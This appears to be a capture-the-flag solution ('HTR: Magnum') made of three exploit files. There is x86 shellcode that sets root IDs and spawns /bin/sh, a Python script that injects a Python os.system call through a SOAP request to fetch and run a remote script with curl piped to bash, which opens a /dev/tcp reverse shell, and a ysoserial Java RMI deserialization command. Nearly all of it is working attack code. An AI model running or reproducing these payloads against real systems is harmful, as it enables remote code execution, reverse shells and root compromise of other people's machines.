HTR: Magnum

a.asm

section .text
    global main

main:
    xor     eax, eax
    xor     ebx, ebx
    xor     ecx, ecx
    xor     edx, edx
    mov     al, 0xd0
    int     0x80       ; setresuid(0, 0, 0)
    
    xor     eax, eax
    mov     al, 11
    push     ecx
    push     0x68732f2f
    push     0x6e69622f
    mov     ebx, esp
    push     ecx
    mov     edx, esp
    push     ebx
    mov     ecx,esp
    int     0x80

a.py

import requests
from bs4 import BeautifulSoup
import socket
import threading
import queue
import http.server
import socketserver

data_q = queue.Queue()

class QuietHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, format, *args):
        pass

def start_http_server(port=8081):
    handler = QuietHTTPRequestHandler
    with socketserver.TCPServer(("", port), handler) as httpd:
        httpd.serve_forever()

def start_server(host='0.0.0.0', port=4444):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind((host, port))
    server_socket.listen(1)
    while True:
        client_socket, client_address = server_socket.accept()
        with client_socket:
            while True:
                data = client_socket.recv(1024)
                if not data:
                    break
                recv_data = data.decode('utf-8')
                data_q.put(recv_data)
                client_socket.sendall(data)

def execute_command(data):
    data = '/bin/bash -c "%s >& /dev/tcp/my_ip/4444 0>&1"' % data
    with open("rev.sh", "w") as file:
        file.write(data)

def send_command():
    S = requests.Session()
    command_headers = {
        "Content-Type": "text/xml;charset=UTF-8",
        "SOAPAction": "http://localhost:xxxx/xxxxxxxxx/xxxxxx/xxxxxxxxxxxxxxxx"
    }
    url = "http://xx.x.x.xxx:xxxx/xxxxxxxxx/xxxxxx/xxxxxxxxxxxxxxxx"
    command_data = '<?xml version="1.0" encoding="utf-8" ?><soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:xxxxxxxxxxxxxxxx"><soapenv:Header/><soapenv:Body><urn:xxxxxxxxxxxxxxxx soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><xxxxxxxxxxxxxxxx xsi:type="xsd:string">__import__("os").system("curl -s http://my_ip:8081/rev.sh | bash")</xxxxxxxxxxxxxxxx><xxxxxxxxxxxxxxxx xsi:type="xsd:string">xxxxxxxxxxxxxxxx</xxxxxxxxxxxxxxxx></urn:xxxxxxxxxxxxxxxx></soapenv:Body></soapenv:Envelope>'
    S.post(url, data=command_data, headers=command_headers)

def user_input_thread():
    while True:
        user_input = input('> ').strip()
        execute_command(user_input)
        send_command()

if __name__ == "__main__":
    http_thread = threading.Thread(target=start_http_server, daemon=True)
    http_thread.start()
    server_thread = threading.Thread(target=start_server, daemon=True)
    server_thread.start()
    input_thread = threading.Thread(target=user_input_thread, daemon=True)
    input_thread.start()
    while True:
        recv_data = data_q.get()
        if recv_data:
            print(recv_data)

rmi.sh

rmg serial target_ip xxxx CommonsCollections7 '/tmp/a' --bound-name ServiceMonitor --signature "String SendProcess(String str, Object obj)" --yso /opt/ysoserial.jar